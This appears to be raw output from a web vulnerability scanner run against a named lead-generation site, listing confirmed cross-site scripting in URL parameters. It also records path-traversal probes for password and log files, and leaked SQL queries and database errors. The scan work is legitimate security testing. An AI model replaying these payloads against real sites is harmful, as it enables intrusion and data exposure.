User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rpigqnsqid2gphqmquejdffth6; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005B1)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/phsy00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B1)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=36vcqcpo5r7s1u9ub39ne2pqa2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '"--></style></script><script>alert(0x0005B2)</script>

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B2)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f6dckrqo0bup2vuvlo1nm9gqa5; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join 